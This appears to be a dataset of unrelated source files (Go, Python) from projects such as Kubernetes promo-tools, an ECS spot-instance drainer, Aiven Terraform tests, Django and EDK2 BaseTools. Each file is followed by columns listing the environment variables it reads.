Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package manifest_test
import (
"fmt"
"os"
"path/filepath"
"testing"
"github.com/stretchr/testify/require"
"golang.org/x/xerrors"
"sigs.k8s.io/promo-tools/v3/image/manifest"
"sigs.k8s.io/promo-tools/v3/internal/legacy/dockerregistry/registry"
"sigs.k8s.io/promo-tools/v3/internal/legacy/dockerregistry/schema"
"sigs.k8s.io/promo-tools/v3/types/image"
)
// TODO: Consider merging this with bazelTestPath() from inventory
func testPath(paths ...string) string {
prefix := []string{
os.Getenv("PWD"),
"testdata",
}
return filepath.Join(append(prefix, paths...)...)
}
func TestFind(t *testing.T) {
pwd := testPath()
srcRC := registry.Context{
Name: "gcr.io/foo-staging",
ServiceAccount: "[email protected]",
Src: true,
}
tests := []struct {
// name is folder name
name string
input manifest.GrowOptions
expectedManifest schema.Manifest
expectedErr error
}{
{
"empty",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "empty"),
StagingRepo: "gcr.io/foo",
},
schema.Manifest{},
&os.PathError{
Op: "stat",
Path: filepath.Join(pwd, "empty/images"),
Err: fmt.Errorf("no such file or directory"),
},
},
{
"singleton",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "singleton"),
StagingRepo: "gcr.io/foo-staging",
},
schema.Manifest{
Registries: []registry.Context{
srcRC,
{
Name: "us.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
{
Name: "eu.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
{
Name: "asia.gcr.io/some-prod",
ServiceAccount: "[email protected]",
},
},
Images: []registry.Image{
{
Name: "foo-controller",
Dmap: registry.DigestTags{
"sha256:c3d310f4741b3642497da8826e0986db5e02afc9777a2b8e668c8e41034128c1": {"1.0"},
},
},
},
Filepath: filepath.Join(pwd, "singleton/manifests/a/promoter-manifest.yaml"),
},
nil,
},
{
"singleton (unrecognized staging repo)",
manifest.GrowOptions{
BaseDir: filepath.Join(pwd, "singleton"),
StagingRepo: "gcr.io/nonsense-staging",
},
schema.Manifest{},
fmt.Errorf("could not find Manifest for %q", "gcr.io/nonsense-staging"),
},
}
for _, test := range tests {
gotManifest, gotErr := manifest.Find(&test.input)
// Clean up gotManifest for purposes of comparing against expected
// results. Namely, clear out the SrcRegistry pointer because this will
// always be different.
gotManifest.SrcRegistry = nil
require.Equal(t, test.expectedManifest, gotManifest)
var gotErrStr string
var expectedErrStr string
if gotErr != nil {
gotErrStr = gotErr.Error()
}
if test.expectedErr != nil {
expectedErrStr = test.expectedErr.Error()
}
require.Equal(t, expectedErrStr, gotErrStr)
}
}
func TestApplyFilters(t *testing.T) {
tests := []struct {
// name is folder name
name string
inputOptions manifest.GrowOptions
inputRii registry.RegInvImage
expectedRii registry.RegInvImage
expectedErr error
}{
{
"empty rii",
manifest.GrowOptions{},
registry.RegInvImage{},
registry.RegInvImage{},
nil,
},
{
"no filters --- same as input",
manifest.GrowOptions{},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
nil,
},
{
"remove 'latest' tag by default, even if no filters",
manifest.GrowOptions{},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"2.0"},
},
},
nil,
},
{
"filter on image name only",
manifest.GrowOptions{
FilterImages: []image.Name{"bar"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"bar": {
"sha256:111": {"1.0"},
},
},
nil,
},
{
"filter on tag only",
manifest.GrowOptions{
FilterTags: []image.Tag{"1.0"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"bar": {
"sha256:111": {"1.0"},
},
},
nil,
},
{
"filter on 'latest' tag",
manifest.GrowOptions{
FilterTags: []image.Tag{"latest"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{},
xerrors.New("no images survived filtering; double-check your --filter_* flag(s) for typos"),
},
{
"filter on digest",
manifest.GrowOptions{
FilterDigests: []image.Digest{"sha256:222"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "2.0"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.0"},
},
},
registry.RegInvImage{
"foo": {
"sha256:222": {"3.0"},
},
},
nil,
},
{
"filter on shared tag (multiple images share same tag)",
manifest.GrowOptions{
FilterTags: []image.Tag{"1.2.3"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "1.2.3"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.2.3"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"1.2.3"},
},
"bar": {
"sha256:111": {"1.2.3"},
},
},
nil,
},
{
"filter on shared tag and image name (multiple images share same tag)",
manifest.GrowOptions{
FilterImages: []image.Name{"foo"},
FilterTags: []image.Tag{"1.2.3"},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"latest", "1.2.3"},
"sha256:222": {"3.0"},
},
"bar": {
"sha256:111": {"latest", "1.2.3"},
},
},
registry.RegInvImage{
"foo": {
"sha256:000": {"1.2.3"},
},
},
nil,
},
}
for _, test := range tests {
gotRii, gotErr := manifest.ApplyFilters(&test.inputOptions, test.inputRii)
require.Equal(t, test.expectedRii, gotRii)
if test.expectedErr != nil {
require.Equal(t, test.expectedErr.Error(), gotErr.Error())
} else {
require.Equal(t, test.expectedErr, gotErr)
}
}
}
|
[
"\"PWD\""
] |
[] |
[
"PWD"
] |
[]
|
["PWD"]
|
go
| 1 | 0 | |
tests/systemtest_mce.py
|
"""Integration test to check mce performance"""
import numpy as np
np.warnings.filterwarnings('ignore') # noqa
import os
os.environ['PYQTGRAPH_QT_LIB'] = 'PyQt5' # noqa
import time
import sys
import os.path as op
from PyQt5 import QtCore, QtWidgets
from cognigraph.helpers.brainvision import read_fif_data
from cognigraph.pipeline import Pipeline
from cognigraph.nodes import sources, processors, outputs
from cognigraph import TIME_AXIS
from cognigraph.gui.window import GUIWindow
app = QtWidgets.QApplication(sys.argv)
pipeline = Pipeline()
cur_dir = '/home/dmalt/Code/python/cogni_submodules'
test_data_path = cur_dir + '/tests/data/'
print(test_data_path)
sim_data_fname = 'raw_sim_nobads.fif'
# sim_data_fname = 'Koleno.fif'
# fwd_fname = 'dmalt_custom_lr-fwd.fif'
fwd_fname = 'dmalt_custom_mr-fwd.fif'
# fwd_fname = 'sample_1005-eeg-oct-6-fwd.fif'
surf_dir = '/home/dmalt/mne_data/MNE-sample-data/subjects/sample/surf'
fwd_path = op.join(test_data_path, fwd_fname)
sim_data_path = op.join(test_data_path, sim_data_fname)
source = sources.FileSource(file_path=sim_data_path)
source.loop_the_file = True
source.MAX_SAMPLES_IN_CHUNK = 10000
pipeline.source = source
# Processors
preprocessing = processors.Preprocessing(collect_for_x_seconds=30)
pipeline.add_processor(preprocessing)
linear_filter = processors.LinearFilter(lower_cutoff=8.0, upper_cutoff=12.0)
pipeline.add_processor(linear_filter)
inverse_model = processors.MCE(forward_model_path=fwd_path, snr=1.0)
# inverse_model = processors.InverseModel(method='MNE', forward_model_path=fwd_path, snr=1.0)
pipeline.add_processor(inverse_model)
envelope_extractor = processors.EnvelopeExtractor()
# pipeline.add_processor(envelope_extractor)
# Outputs
global_mode = outputs.BrainViewer.LIMITS_MODES.GLOBAL
three_dee_brain = outputs.BrainViewer(
limits_mode=global_mode, buffer_length=10, surfaces_dir=surf_dir)
pipeline.add_output(three_dee_brain)
# pipeline.add_output(outputs.LSLStreamOutput())
# pipeline.initialize_all_nodes()
signal_viewer = outputs.SignalViewer()
pipeline.add_output(signal_viewer, input_node=linear_filter)
window = GUIWindow(pipeline=pipeline)
window.init_ui()
window.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
window.show()
base_controls = window._controls._base_controls
source_controls = base_controls.source_controls
processors_controls = base_controls.processors_controls
outputs_controls = base_controls.outputs_controls
source_controls.source_type_combo.setValue(source_controls.SOURCE_TYPE_PLACEHOLDER)
linear_filter_controls = processors_controls.children()[0]
envelope_controls = processors_controls.children()[2]
# envelope_controls.disabled.setValue(True)
three_dee_brain_controls = outputs_controls.children()[0]
three_dee_brain_controls.threshold_slider.setValue(50)
# three_dee_brain_controls.limits_mode_combo.setValue('Local')
window.initialize()
# start_s, stop_s = 80, 100
# with source.not_triggering_reset():
# source.data, _ = read_fif_data(sim_data_path, time_axis=TIME_AXIS, start_s=start_s, stop_s=stop_s)
class AsyncUpdater(QtCore.QRunnable):
_stop_flag = False
def __init__(self):
super(AsyncUpdater, self).__init__()
self.setAutoDelete(False)
def run(self):
self._stop_flag = False
while not self._stop_flag:
start = time.time()
pipeline.update_all_nodes()
end = time.time()
# Force sleep to update at 10Hz
if end - start < 0.1:
time.sleep(0.1 - (end - start))
def stop(self):
self._stop_flag = True
pool = QtCore.QThreadPool.globalInstance()
updater = AsyncUpdater()
is_paused = True
def toggle_updater():
global pool
global updater
global is_paused
if is_paused:
is_paused = False
pool.start(updater)
else:
is_paused = True
updater.stop()
pool.waitForDone()
window.run_button.clicked.connect(toggle_updater)
window.show()
updater.stop()
pool.waitForDone()
sys.exit(app.exec_())
# def run():
# pipeline.update_all_nodes()
# # print(pipeline.source._samples_already_read / 500)
# timer = QtCore.QTimer()
# timer.timeout.connect(run)
# frequency = pipeline.frequency
# output_frequency = 10
# # timer.setInterval(1000. / frequency * 500)
# timer.setInterval(1000. / output_frequency)
# source.loop_the_file = False
# source.MAX_SAMPLES_IN_CHUNK = 10000
# # envelope.disabled = True
# if __name__ == '__main__':
# import sys
# timer.start()
# timer.stop()
# TODO: this runs when in iPython. It should not.
# Start Qt event loop unless running in interactive mode or using pyside.
# if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
# sys.exit(QtGui.QApplication.instance().exec_())
|
[] |
[] |
[
"PYQTGRAPH_QT_LIB"
] |
[]
|
["PYQTGRAPH_QT_LIB"]
|
python
| 1 | 0 | |
main.go
|
package main
import (
"fmt"
"net/http"
"time"
"io/ioutil"
"encoding/json"
"log"
"os"
// "strings"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/ecs"
)
type instance struct {
Cluster string `json:"Cluster"`
Arn string `json:"ContainerInstanceArn"`
}
func getContainerInstance() instance {
client := http.Client{
Timeout: time.Second * 2, // Maximum of 2 secs
}
containerInstance := instance{}
req, err := http.NewRequest(http.MethodGet, "http://0.0.0.0:51678/v1/metadata", nil)
if err != nil {
log.Fatal(err)
}
res, getErr := client.Do(req)
if getErr != nil {
fmt.Println(getErr)
return containerInstance
// log.Fatal(getErr)
}
body, readErr := ioutil.ReadAll(res.Body)
if readErr != nil {
log.Fatal(readErr)
}
jsonErr := json.Unmarshal(body, &containerInstance)
if jsonErr != nil {
log.Fatal(jsonErr)
}
fmt.Printf("HTTP: %s\n", res.Status)
return containerInstance
}
func isStopping() bool {
client := http.Client{
Timeout: time.Second * 2, // Maximum of 2 secs
}
ec2_url := os.Getenv("EC2METADATA_URL")
if ec2_url == "" {
ec2_url = "169.254.169.254"
}
url := fmt.Sprintf("http://%s/latest/meta-data/spot/termination-time", ec2_url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
log.Fatal(err)
}
res, getErr := client.Do(req)
if getErr != nil {
log.Fatal(getErr)
}
fmt.Println("Checking spot status...")
return res.StatusCode == 200
}
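// Illustrative note (not part of the original file): isStopping treats any HTTP 200
// from the spot termination-time metadata path as "instance is being reclaimed".
// EC2METADATA_URL lets a sketch like the one below point at a local mock instead of
// the real 169.254.169.254 endpoint (binary name is a placeholder):
//
//	EC2METADATA_URL=localhost:8000 ./spot-drainer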
func drain(containerInstance instance) {
// mark the container instance as DRAINING via the ECS API
svc := ecs.New(session.New())
input := &ecs.UpdateContainerInstancesStateInput {
ContainerInstances: []*string{aws.String(containerInstance.Arn)},
Cluster: aws.String(containerInstance.Cluster),
Status: aws.String("DRAINING"),
}
req, resp := svc.UpdateContainerInstancesStateRequest(input)
err := req.Send()
if err != nil { // resp is now filled
fmt.Println(resp)
fmt.Println(err)
}
fmt.Println("Successfully drained the instance")
os.Exit(0)
}
func main() {
containerInstance := getContainerInstance()
for containerInstance == (instance{}) {
fmt.Println("Cannot communicate with ECS Agent. Retrying...")
time.Sleep(time.Second * 5)
containerInstance = getContainerInstance()
}
fmt.Printf("Found ECS Container Instance %s\n", containerInstance.Arn)
fmt.Printf("on the %s cluster.\n", containerInstance.Cluster)
for {
if isStopping() {
fmt.Println("Spot instance is being acted upon. Doing something")
fmt.Printf("Drain this %s\n", containerInstance.Arn)
// drain this one
drain(containerInstance)
}
time.Sleep(time.Second * 5)
}
}
|
[
"\"EC2METADATA_URL\""
] |
[] |
[
"EC2METADATA_URL"
] |
[]
|
["EC2METADATA_URL"]
|
go
| 1 | 0 | |
aiven/resource_connection_pool_test.go
|
package aiven
import (
"fmt"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
"os"
"testing"
)
func init() {
resource.AddTestSweepers("aiven_connection_pool", &resource.Sweeper{
Name: "aiven_connection_pool",
F: sweepConnectionPools,
})
}
func sweepConnectionPools(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
list, err := conn.ConnectionPools.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 {
continue
}
return fmt.Errorf("error retrieving a list of connection pools for a service `%s`: %s", service.Name, err)
}
for _, pool := range list {
err = conn.ConnectionPools.Delete(project.Name, service.Name, pool.PoolName)
if err != nil {
return fmt.Errorf("error destroying connection pool `%s` during sweep: %s", pool.PoolName, err)
}
}
}
}
}
return nil
}
func TestAccAivenConnectionPool_basic(t *testing.T) {
resourceName := "aiven_connection_pool.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenConnectionPoolResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccConnectionPoolResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenConnectionPoolAttributes("data.aiven_connection_pool.pool"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "username", fmt.Sprintf("user-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_name", fmt.Sprintf("test-acc-pool-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "pool_size", "25"),
resource.TestCheckResourceAttr(resourceName, "pool_mode", "transaction"),
),
},
},
})
}
func testAccConnectionPoolResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
}
}
resource "aiven_service_user" "foo" {
service_name = aiven_service.bar.service_name
project = data.aiven_project.foo.project
username = "user-%s"
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
}
resource "aiven_connection_pool" "foo" {
service_name = aiven_service.bar.service_name
project = data.aiven_project.foo.project
database_name = aiven_database.foo.database_name
username = aiven_service_user.foo.username
pool_name = "test-acc-pool-%s"
pool_size = 25
pool_mode = "transaction"
}
data "aiven_connection_pool" "pool" {
project = aiven_connection_pool.foo.project
service_name = aiven_connection_pool.foo.service_name
pool_name = aiven_connection_pool.foo.pool_name
depends_on = [aiven_connection_pool.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name, name, name)
}
func testAccCheckAivenConnectionPoolAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["pool_name"] == "" {
return fmt.Errorf("expected to get a pool_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["username"] == "" {
return fmt.Errorf("expected to get a username from Aiven")
}
if a["pool_size"] != "25" {
return fmt.Errorf("expected to get a correct pool_size from Aiven")
}
if a["pool_mode"] != "transaction" {
return fmt.Errorf("expected to get a correct pool_mode from Aiven")
}
return nil
}
}
func testAccCheckAivenConnectionPoolResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each connection pool is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_connection_pool" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
pool, err := c.ConnectionPools.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if pool != nil {
return fmt.Errorf("connection pool (%s) still exists", rs.Primary.ID)
}
}
return nil
}
|
[
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
] |
[] |
[
"AIVEN_PROJECT_NAME"
] |
[]
|
["AIVEN_PROJECT_NAME"]
|
go
| 1 | 0 | |
examples/image/delete/go/deleteAnUploadedImage.go
|
package example
import (
"fmt"
"os"
"github.com/micro/services/clients/go/image"
)
// Delete an image previously uploaded.
func DeleteAnUploadedImage() {
imageService := image.NewImageService(os.Getenv("MICRO_API_TOKEN"))
rsp, err := imageService.Delete(&image.DeleteRequest{
Url: "https://cdn.m3ocontent.com/micro/images/micro/41e23b39-48dd-42b6-9738-79a313414bb8/cat.png",
})
fmt.Println(rsp, err)
}
|
[
"\"MICRO_API_TOKEN\""
] |
[] |
[
"MICRO_API_TOKEN"
] |
[]
|
["MICRO_API_TOKEN"]
|
go
| 1 | 0 | |
tests/unit/test_logging.py
|
import os
from jina.logging.base import get_logger
def test_logging_message():
os.environ['JINA_LOG_VERBOSITY'] = 'success'
logger = get_logger('test_logger')
logger.debug('this is test debug message')
logger.info('this is test info message')
logger.success('this is test success message')
logger.warning('this is test warning message')
logger.error('this is test error message')
logger.critical('this is test critical message')
|
[] |
[] |
[
"JINA_LOG_VERBOSITY"
] |
[]
|
["JINA_LOG_VERBOSITY"]
|
python
| 1 | 0 | |
config/wsgi.py
|
"""
WSGI config for coruscant-django project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from pathlib import Path
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# coruscant_django directory.
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent
sys.path.append(str(ROOT_DIR / "coruscant_django"))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
[] |
[] |
[
"DJANGO_SETTINGS_MODULE"
] |
[]
|
["DJANGO_SETTINGS_MODULE"]
|
python
| 1 | 0 | |
BaseTools/Source/Python/Workspace/DscBuildData.py
|
## @file
# This file is used to create a database used by build tool
#
# Copyright (c) 2008 - 2019, Intel Corporation. All rights reserved.<BR>
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Platform build information from DSC file
#
# This class is used to retrieve information stored in the database and convert it
# into PlatformBuildClassObject form for easier use by AutoGen.
#
from __future__ import print_function
from __future__ import absolute_import
from Common.StringUtils import *
from Common.DataType import *
from Common.Misc import *
from types import *
from Common.Expression import *
from CommonDataClass.CommonClass import SkuInfoClass
from Common.TargetTxtClassObject import TargetTxt
from Common.ToolDefClassObject import ToolDef
from .MetaDataTable import *
from .MetaFileTable import *
from .MetaFileParser import *
from .WorkspaceCommon import GetDeclaredPcd
from Common.Misc import AnalyzeDscPcd
from Common.Misc import ProcessDuplicatedInf,RemoveCComments,ArrayIndex
import re
from Common.Parsing import IsValidWord
from Common.VariableAttributes import VariableAttributes
import Common.GlobalData as GlobalData
import subprocess
from functools import reduce
from Common.Misc import SaveFileOnChange
from Workspace.BuildClassObject import PlatformBuildClassObject, StructurePcd, PcdClassObject, ModuleBuildClassObject
from collections import OrderedDict, defaultdict
def _IsFieldValueAnArray (Value):
Value = Value.strip()
if Value.startswith(TAB_GUID) and Value.endswith(')'):
return True
if Value.startswith('L"') and Value.endswith('"') and len(list(Value[2:-1])) > 1:
return True
if Value[0] == '"' and Value[-1] == '"' and len(list(Value[1:-1])) > 1:
return True
if Value[0] == '{' and Value[-1] == '}':
return True
if Value.startswith("L'") and Value.endswith("'") and len(list(Value[2:-1])) > 1:
return True
if Value[0] == "'" and Value[-1] == "'" and len(list(Value[1:-1])) > 1:
return True
return False
PcdValueInitName = 'PcdValueInit'
PcdMainCHeader = '''
/**
DO NOT EDIT
FILE auto-generated
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <PcdValueCommon.h>
'''
PcdMainCEntry = '''
int
main (
int argc,
char *argv[]
)
{
return PcdValueMain (argc, argv);
}
'''
PcdMakefileHeader = '''
#
# DO NOT EDIT
# This file is auto-generated by build utility
#
'''
WindowsCFLAGS = 'CFLAGS = $(CFLAGS) /wd4200 /wd4034 /wd4101 '
LinuxCFLAGS = 'BUILD_CFLAGS += -Wno-pointer-to-int-cast -Wno-unused-variable '
PcdMakefileEnd = '''
!INCLUDE $(BASE_TOOLS_PATH)\Source\C\Makefiles\ms.common
LIBS = $(LIB_PATH)\Common.lib
!INCLUDE $(BASE_TOOLS_PATH)\Source\C\Makefiles\ms.app
'''
AppTarget = '''
all: $(APPFILE)
$(APPFILE): $(OBJECTS)
%s
'''
PcdGccMakefile = '''
MAKEROOT ?= $(EDK_TOOLS_PATH)/Source/C
LIBS = -lCommon
'''
variablePattern = re.compile(r'[\t\s]*0[xX][a-fA-F0-9]+$')
SkuIdPattern = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
## regular expressions for finding decimal and hex numbers
Pattern = re.compile('^[1-9]\d*|0$')
HexPattern = re.compile(r'0[xX][0-9a-fA-F]+$')
## Regular expression for finding header file inclusions
from AutoGen.GenMake import gIncludePattern
## Find dependencies for one source file
#
# By recursively searching for "#include" directives in a file, find out all the
# files needed by the given source file. The dependencies will only be searched for
# in the given search path list.
#
# @param SearchPathList The list of search path
#
# @retval list The list of files the given source file depends on
#
def GetDependencyList(FileStack, SearchPathList):
DepDb = dict()
DependencySet = set(FileStack)
while len(FileStack) > 0:
F = FileStack.pop()
FullPathDependList = []
CurrentFileDependencyList = []
if F in DepDb:
CurrentFileDependencyList = DepDb[F]
else:
try:
Fd = open(F, 'r')
FileContent = Fd.read()
except BaseException as X:
EdkLogger.error("build", FILE_OPEN_FAILURE, ExtraData=F + "\n\t" + str(X))
finally:
if "Fd" in dir(locals()):
Fd.close()
if len(FileContent) == 0:
continue
try:
if FileContent[0] == 0xff or FileContent[0] == 0xfe:
FileContent = FileContent.decode('utf-16')
else:
FileContent = FileContent.decode()
except:
# The file is not txt file. for example .mcb file
continue
IncludedFileList = gIncludePattern.findall(FileContent)
for Inc in IncludedFileList:
Inc = Inc.strip()
Inc = os.path.normpath(Inc)
CurrentFileDependencyList.append(Inc)
DepDb[F] = CurrentFileDependencyList
CurrentFilePath = os.path.dirname(F)
PathList = [CurrentFilePath] + SearchPathList
for Inc in CurrentFileDependencyList:
for SearchPath in PathList:
FilePath = os.path.join(SearchPath, Inc)
if not os.path.exists(FilePath):
continue
if FilePath not in DependencySet:
FileStack.append(FilePath)
FullPathDependList.append(FilePath)
break
DependencySet.update(FullPathDependList)
DependencyList = list(DependencySet) # remove duplicate ones
return DependencyList
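# Illustrative sketch (not part of the original file): a hypothetical call, with
# made-up paths, might look like
#   deps = GetDependencyList(['MdeModulePkg/Foo/Foo.c'], ['MdePkg/Include'])
# returning Foo.c itself plus every header reachable through its #include
# directives that can be resolved against the given search paths.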
class DscBuildData(PlatformBuildClassObject):
# dict used to convert PCD type in database to string used by build tool
_PCD_TYPE_STRING_ = {
MODEL_PCD_FIXED_AT_BUILD : TAB_PCDS_FIXED_AT_BUILD,
MODEL_PCD_PATCHABLE_IN_MODULE : TAB_PCDS_PATCHABLE_IN_MODULE,
MODEL_PCD_FEATURE_FLAG : TAB_PCDS_FEATURE_FLAG,
MODEL_PCD_DYNAMIC : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_DEFAULT : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_HII : TAB_PCDS_DYNAMIC_HII,
MODEL_PCD_DYNAMIC_VPD : TAB_PCDS_DYNAMIC_VPD,
MODEL_PCD_DYNAMIC_EX : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_DEFAULT : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_HII : TAB_PCDS_DYNAMIC_EX_HII,
MODEL_PCD_DYNAMIC_EX_VPD : TAB_PCDS_DYNAMIC_EX_VPD,
}
# dict used to convert part of [Defines] to members of DscBuildData directly
_PROPERTY_ = {
#
# Required Fields
#
TAB_DSC_DEFINES_PLATFORM_NAME : "_PlatformName",
TAB_DSC_DEFINES_PLATFORM_GUID : "_Guid",
TAB_DSC_DEFINES_PLATFORM_VERSION : "_Version",
TAB_DSC_DEFINES_DSC_SPECIFICATION : "_DscSpecification",
# TAB_DSC_DEFINES_OUTPUT_DIRECTORY : "_OutputDirectory",
# TAB_DSC_DEFINES_SUPPORTED_ARCHITECTURES : "_SupArchList",
# TAB_DSC_DEFINES_BUILD_TARGETS : "_BuildTargets",
TAB_DSC_DEFINES_SKUID_IDENTIFIER : "_SkuName",
# TAB_DSC_DEFINES_FLASH_DEFINITION : "_FlashDefinition",
TAB_DSC_DEFINES_BUILD_NUMBER : "_BuildNumber",
TAB_DSC_DEFINES_MAKEFILE_NAME : "_MakefileName",
TAB_DSC_DEFINES_BS_BASE_ADDRESS : "_BsBaseAddress",
TAB_DSC_DEFINES_RT_BASE_ADDRESS : "_RtBaseAddress",
# TAB_DSC_DEFINES_RFC_LANGUAGES : "_RFCLanguages",
# TAB_DSC_DEFINES_ISO_LANGUAGES : "_ISOLanguages",
}
# used to compose dummy library class name for those forced library instances
_NullLibraryNumber = 0
## Constructor of DscBuildData
#
# Initialize object of DscBuildData
#
# @param FilePath The path of platform description file
# @param RawData The raw data of DSC file
# @param BuildDataBase Database used to retrieve module/package information
# @param Arch The target architecture
# @param Platform (not used for DscBuildData)
# @param Macros Macros used for replacement in DSC file
#
def __init__(self, FilePath, RawData, BuildDataBase, Arch=TAB_ARCH_COMMON, Target=None, Toolchain=None):
self.MetaFile = FilePath
self._RawData = RawData
self._Bdb = BuildDataBase
self._Arch = Arch
self._Target = Target
self._Toolchain = Toolchain
self._ToolChainFamily = None
self._Clear()
self.WorkspaceDir = os.getenv("WORKSPACE") if os.getenv("WORKSPACE") else ""
self.DefaultStores = None
self.SkuIdMgr = SkuClass(self.SkuName, self.SkuIds)
@property
def OutputPath(self):
if os.getenv("WORKSPACE"):
return os.path.join(os.getenv("WORKSPACE"), self.OutputDirectory, self._Target + "_" + self._Toolchain, PcdValueInitName)
else:
return os.path.dirname(self.DscFile)
## XXX[key] = value
def __setitem__(self, key, value):
self.__dict__[self._PROPERTY_[key]] = value
## value = XXX[key]
def __getitem__(self, key):
return self.__dict__[self._PROPERTY_[key]]
## "in" test support
def __contains__(self, key):
return key in self._PROPERTY_
## Set all internal used members of DscBuildData to None
def _Clear(self):
self._Header = None
self._PlatformName = None
self._Guid = None
self._Version = None
self._DscSpecification = None
self._OutputDirectory = None
self._SupArchList = None
self._BuildTargets = None
self._SkuName = None
self._PcdInfoFlag = None
self._VarCheckFlag = None
